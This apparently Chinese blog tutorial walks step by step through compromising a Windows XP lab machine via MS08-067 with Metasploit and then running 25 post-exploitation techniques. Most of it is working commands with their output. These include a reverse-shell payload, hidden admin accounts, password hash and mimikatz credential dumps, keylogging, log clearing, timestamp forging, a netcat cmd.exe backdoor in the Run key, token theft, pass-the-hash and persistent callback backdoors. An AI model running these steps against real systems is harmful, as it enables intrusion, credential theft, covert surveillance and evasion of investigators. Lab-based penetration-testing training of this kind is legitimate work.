渗透测试-[后渗透25招]
0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(2) 键盘监听4.12 禁用目标系统的键盘或鼠标4.13 清除日志4.14 查找文件4.15 伪造时间戳(1)查看时间戳(2)将help.gif的时间戳复制给iisstart.asp4.16 目标系统网络信息搜集4.17 添加路由到目标主机并进行扫描(1)做arp扫描(2)做端口扫描4.18 mimikatz/kiwi抓取密码4.19 远程桌面(1)开启远程桌面并添加用户(1)连接RDP远程控制目标主机4.20 抓取目标主机的流量包4.21 通过操作注册表植入后门(1) 上传nc(2) 枚举run下的key(3) 设置键值(4) 查看键值(5) 访问后门4.22令牌操纵(1) 令牌假冒(2) 令牌窃取4.23 哈希利用(1) 获取哈希值(2)哈希传递4.24 后门植入(1) persistence启动项后门(2) metsvc服务后门25.重启/关机本文基于ms08-067为例子,总结记录了常用的后渗透技巧,从简单的信息搜集到后门植入。
0.实验环境
网段:192.168.155.0/24
网卡模式:NAT
攻击机1-Kali-ip:192.168.155.2
攻击机2-mac-ip:192.168.155.1
靶机1winxpSP3英文版-ip:192.168.155.18
靶机2-win7-ip:192.168.155.19
1.MS08-067漏洞描述【RPC】
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞。Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。
对于Windows 2000、XP和Server ,无需认证便可以利用该漏洞;对于Windows Vista和Server ,可能需要认证。
/en-us/security-updates/securitybulletins//ms08-067 【官方描述】
2.主机发现
nmap -F 192.168.155.0/24
Starting Nmap 7.91 ( ) at -05-03 03:50 EDTNmap scan report for 192.168.155.1Host is up (0.00084s latency).Not shown: 97 closed portsPORTSTATE SERVICE53/tcp open domain5000/tcp open upnp49152/tcp open unknownMAC Address: FA:FF:C2:C2:93:64 (Unknown)Nmap scan report for 192.168.155.18Host is up (0.0018s latency).Not shown: 93 closed portsPORTSTATE SERVICE25/tcp open smtp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds1025/tcp open NFS-or-IISMAC Address: 00:0C:29:50:ED:13 (VMware)Nmap scan report for 192.168.155.2Host is up (0.0000060s latency).All 100 scanned ports on 192.168.155.2 are closedNmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds
目标主机IP:192.168.155.18
端口开放情况:
PORTSTATE SERVICE25/tcp open smtp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds1025/tcp open NFS-or-IISMAC Address: 00:0C:29:50:ED:13 (VMware)
目标端口:445
服务:microsoft-ds
3 利用MSF通过ms08-067漏洞渗透目标系统
msfconsolesearch ms08-067use msf6 > use exploit/windows/smb/ms08_067_netapishow targetsset target 0set RHOSTS 192.168.155.18set PAYLOAD windows/meterpreter/reverse_tcpexploit
exploit[*] Started reverse TCP handler on 192.168.155.2:4444[*] 192.168.155.18:445 - Automatically detecting the target...[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...[*] Sending stage (175174 bytes) to 192.168.155.18[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at -05-03 04:42:05 -0400
4.后渗透利用
4.1.系统信息搜集
信息收集的脚本位于,这里仅展示几个例子。
/usr/share/metasploit-framework/modules/post/windows/gather/usr/share/metasploit-framework/modules/post/linux/gather
(1)获取系统基本信息
meterpreter > sysinfo
Computer : DH-CA8822AB9589OS : Windows XP (5.1 Build 2600, Service Pack 3).Architecture : x86System Language : en_USDomain: WORKGROUPLogged On Users : 2Meterpreter: x86/windows
如果目标是SP2系统,由于微软已不再维护,会存在一大堆漏洞。
(2)判断目标系统是否为虚拟机
meterpreter > run post/windows/gather/checkvm
[*] Checking if DH-CA8822AB9589 is a Virtual Machine ...[+] This is a VMware Virtual Machine
(3)磁盘分区情况
meterpreter > run post/windows/gather/forensics/enum_drives
Device Name:Type: Size (bytes):----------------- -------------<Physical Drives:>\\.\PhysicalDrive0 4702111234474983745<Logical Drives:>\\.\A: 4702111234474983745\\.\C: 4702111234474983745\\.\D: 4702111234474983745
(4)目标软件安装情况
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on DH-CA8822AB9589Installed Applications======================NameVersion-----------Adobe Reader 99.0.0KingView 6.53 6.53KingView Driver6.53Microsoft Office Standard Edition 11.0.8173.0Sentinel Protection Installer 7.5.07.5.0VMware Tools 8.1.4.11056WebFldrs XP 9.50.7523[+] Results stored in: /root/.msf4/loot/0505234757_default_192.168.155.18_host.application_805792.txt
(5)其他信息搜集
run post/windows/gather/dumplinks #获取最近的文件操作run post/linux/gather/checkvm #是否虚拟机run post/windows/gather/checkvm #是否虚拟机run post/windows/gather/enum_ie #获取IE缓存run post/windows/gather/enum_chrome #获取Chrome缓存run post/windows/gather/enum_patches #补丁信息run post/windows/gather/forensics/enum_drives #查看分区run post/windows/gather/enum_domain #查找域控run post/windows/gather/enum_applications #获取安装软件信息
4.2查看权限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
可以看到获得了system权限。
4.3 进入目标系统Shell
meterpreter > shell
Process 3980 created.Channel 2 created.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>
成功进入目标系统的shell环境。
4.4 添加账号
C:\WINDOWS\system32>net user sxk /add
net user sxk /addThe command completed successfully.
4.5 将新账号添加到管理员组中
C:\WINDOWS\system32>net localgroup administrators sxk /add
net localgroup administrators sxk /addThe command completed successfully.
用户已经成功添加到目标系统的管理员组中。
4.6 截屏
meterpreter > screenshot
Screenshot saved to: /root/Desktop/YhioHCHD.jpeg
4.7 文件上传
meterpreter > upload /Users/sxk/MYSHXRuM.jpeg
[*] uploading : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg[*] uploaded : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
pwd
C:\Windows\system32
在目标系统C盘中成功上传文件。
4.8 下载文件
meterpreter > download drivers/etc/hosts
[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts[*] download : drivers/etc/hosts -> /Users/xiaokaisi/hosts
成功下载到目标系统的hosts文件。
4.9 获取口令hash
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
破解哈希值:
259745cb123a52aa2e693aaacca2db52
31d6cfe0d16ae931b73c59d7e0c089c0
4.10 摄像头
meterpreter > webcam_list [查看摄像头][-] No webcams were foundmeterpreter > webcam_snap [通过摄像头拍照][-] Target does not have a webcammeterpreter > webcam_stream [通过摄像头拍摄视频][-] Target does not have a webcam
4.11 键盘监听
比如要对目标系统用户Administrator的键盘进行记录的话,就需要把进程迁移到Administrator的进程。在system权限下,是无法捕获Administrator的键盘记录。
keyscan_start开启键盘监听后,用keyscan_dump进行记录的导出,如果不想监听了才keyscan_stop。不是先keyscan_stop再keyscan_dump。
(1) ps找到合适的进程进行迁移
meterpreter>ps
3668 3608 explorer.exe 【常用的进程】
meterpreter > migrate 3668
[*] Migrating from 1048 to 3668...[*] Migration completed successfully.
meterpreter > getuid
Server username: client-PC\client
(2) 键盘监听
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...wo shi client ,<Shift>Ilove china<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
成功监听到了目标系统上的用户的键盘输入。“wo shi client ,Ilove china”
4.12 禁用目标系统的键盘或鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标uictl disable keyboard #禁用键盘uictl disable mouse #禁用鼠标
4.13 清除日志
清除windows中的应用程序日志、系统日志、安全日志
clearav
4.14 查找文件
meterpreter > cd C:\\meterpreter > pwd
C:\
search -f *hosts*
4.15 伪造时间戳
meterpreter > pwd
C:\Inetpub\wwwroot
meterpreter > ls
Listing: C:\Inetpub\wwwroot===========================Mode Size Type Last modified Name---- ---- ---- ------------- ----100666/rw-rw-rw- 342 fil 2001-07-21 14:22:32 +0800 help.gif100666/rw-rw-rw- 1898 fil 2001-08-10 14:19:20 +0800 iisstart.asp100666/rw-rw-rw- 8923 fil 2001-08-10 14:19:20 +0800 localstart.asp100666/rw-rw-rw- 356 fil 2001-07-21 14:22:32 +0800 mmc.gif100666/rw-rw-rw- 2806 fil 2001-07-21 14:22:32 +0800 pagerror.gif100666/rw-rw-rw- 1046 fil 2001-07-21 14:22:32 +0800 print.gif100666/rw-rw-rw- 1577 fil 2001-07-21 14:22:32 +0800 warning.gif100666/rw-rw-rw- 1182 fil 2001-07-21 14:22:32 +0800 web.gif100666/rw-rw-rw- 11946 fil 2001-07-21 14:22:32 +0800 winxp.gif
(1)查看时间戳
meterpreter > timestomp -v help.gif
[*] Showing MACE attributes for help.gifModified: 2001-07-21 14:22:32 +0800Accessed: -09-28 11:40:15 +0800Created : -09-28 11:40:15 +0800Entry Modified: -09-28 11:40:28 +0800
meterpreter > timestomp -v iisstart.asp
[*] Showing MACE attributes for iisstart.aspModified: 2001-08-10 14:19:20 +0800Accessed: -09-28 11:40:15 +0800Created : -09-28 11:40:15 +0800Entry Modified: -09-28 11:40:28 +0800
(2)将help.gif的时间戳复制给iisstart.asp
可以看到iisstart.asp的时间戳被篡改了。
4.16 目标系统网络信息搜集
ipconfig/ifconfig [ip信息]netstat -ano [网络端口信息]arp[arp信息]getproxy [查看代理信息]route [路由信息]
4.17 添加路由到目标主机并进行扫描
(1)做arp扫描
(2)做端口扫描
4.18 mimikatz/kiwi抓取密码
meterpreter >creds_wdigest
[+] Running as SYSTEM[*] Retrieving wdigest credentialswdigest credentials===================UsernameDomain Password-------------- --------DH-CA8822AB9589$ WORKGROUP (null)sxkDH-CA8822AB9589
成功获取到用户密码。
meterpreter > kiwi_cmd sekurlsa::logonPasswords
4.19 远程桌面
查看可用的桌面
enumdesktops
获取当前meterpreter 关联的桌面
meterpreter > getdesktop
Session 0\S\D
(1)开启远程桌面并添加用户
脚本位于
/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop[*]RDP is disabled; enabling it ...[*] Setting Terminal Services service startup mode[*]The Terminal Services service is not set to auto, changing it to auto ...[*]Opening port in local firewall if necessary[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506025923_default_192.168.155.18_host.windows.cle_712463.txt
添加用户
run post/windows/manage/enable_rdp USERNAME=lyl PASSWORD=123456
[*] Enabling Remote Desktop[*]RDP is already enabled[*] Setting Terminal Services service startup mode[*]Terminal Services service is already set to auto[*]Opening port in local firewall if necessary[*] Setting user account for logon[*]Adding User: lyl with Password: 123456[*]Adding User: lyl to local group 'Remote Desktop Users'[*]Hiding user from Windows Login screen[*]Adding User: lyl to local group 'Administrators'[*] You can now login with the created user[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506030102_default_192.168.155.18_host.windows.cle_669035.txt
设置端口转发
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
[*] Enabling Remote Desktop[*]RDP is already enabled[*] Setting Terminal Services service startup mode[*]Terminal Services service is already set to auto[*]Opening port in local firewall if necessary[*] Starting the port forwarding at local port 6662[*] Local TCP relay created: 0.0.0.0:6662 <-> 127.0.0.1:3389[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506030321_default_192.168.155.18_host.windows.cle_270181.txt
(1)连接RDP远程控制目标主机
rdesktop 127.0.0.1:6662
4.20 抓取目标主机的流量包
meterpreter > use sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1packets: 18bytes: 1098
meterpreter > sniffer_dump 1 /tmp/msf-sniffer-test.pcap
[*] Flushing packet capture buffer for interface 1...[*] Flushed 139 packets (12986 bytes)[*] Downloaded 100% (12986/12986)...[*] Download completed, converting to PCAP...[*] PCAP file written to /tmp/msf-sniffer-test.pcap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1[*] There are 12 packets (732 bytes) remaining[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
如图所示为抓到的目标主机的流量包。
4.21 通过操作注册表植入后门
(1) 上传nc
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading : /usr/share/windows-binaries/nc.exe -> C:\windows\system32[*] uploaded : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
(2) 枚举run下的key
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\runKeys (1):OptionalComponentsValues (4):VMware ToolsVMware User ProcessICQ LiteAdobe Reader Speed Launchermeterpreter >
(3) 设置键值
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
Successfully set msf_test_nc of REG_SZ.
(4) 查看键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc
Key: HKLM\software\microsoft\windows\currentversion\runName: msf_test_ncType: REG_SZData: C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
(5) 访问后门
成功植入后门。
4.22令牌操纵
(1) 令牌假冒
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > help incognito
查看可用的token
meterpreter > list_tokens -u
假冒DH-CA8822AB9589\sxk token
impersonate_token 'DH-CA8822AB9589\sxk'
使用假冒的token执行cmd
execute -f cmd.exe -i –t
返回重新使用原始token
rev2self
meterpreter > getuidServer username: DH-CA8822AB9589\sxkmeterpreter > rev2selfmeterpreter > getuidServer username: NT AUTHORITY\SYSTEM
(2) 令牌窃取
ps
从指定进程中窃取token
meterpreter > steal_token 1648
Stolen token with username: DH-CA8822AB9589\sxk
meterpreter > getuid
Server username: DH-CA8822AB9589\sxk
删除窃取的token
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMmeterpreter >
4.23 哈希利用
(1) 获取哈希值
从SAM导出密码哈希(需要system权限)
meterpreter > run post/windows/gather/smart_hashdump
(2)哈希传递
通过smart_hashdump获取用户哈希后,可以利用psexec模块进行哈希传递攻击。
前提条件:①开启445端口 smb服务;②开启admin$共享
利用过程如下。
msf > use exploit/windows/smb/psexecmsf > set payload windows/meterpreter/reverse_tcpmsf > set LHOST 192.168.155.2msf > set LPORT 4443msf > set RHOST 192.168.155.18msf >set SMBUser Administratormsf >set SMBPass aad3b4*****04ee:5b5f00*****c424cmsf >set SMBDomain WORKGROUP #域用户需要设置SMBDomainmsf >exploit
4.24 后门植入
metasploit自带的后门有两种方式启动的,一种是通过启动项启动(persistence),一种是通过服务启动(metsvc),另外还可以通过persistence_exe自定义后门文件。
(1) persistence启动项后门
在C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本
在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项
meterpreter > run persistence -X -i 5 -p 6667 -r 192.168.155.2
连接后门
msf > use exploit/multi/handlermsf > set payload windows/meterpreter/reverse_tcpmsf > set LHOST 192.168.155.2msf > set LPORT 6667msf > exploit
(2) metsvc服务后门
在C:\Users***\AppData\Local\Temp\上传了三个文件(metsrv.x86.dll、metsvc-server.exe、metsvc.exe),通过服务启动,服务名为meterpreter
run metsvc -A
连接后门
msf > use exploit/multi/handlermsf > set payload windows/metsvc_bind_tcpmsf > set RHOST 192.168.155.18msf > set LPORT 31337msf > exploit
成功连接到后门。
到此为止,我们在目标系统植入了三个后门。
25.重启/关机
最后来个简单的。
reboot/shutdown
对靶机进行重启关机操作。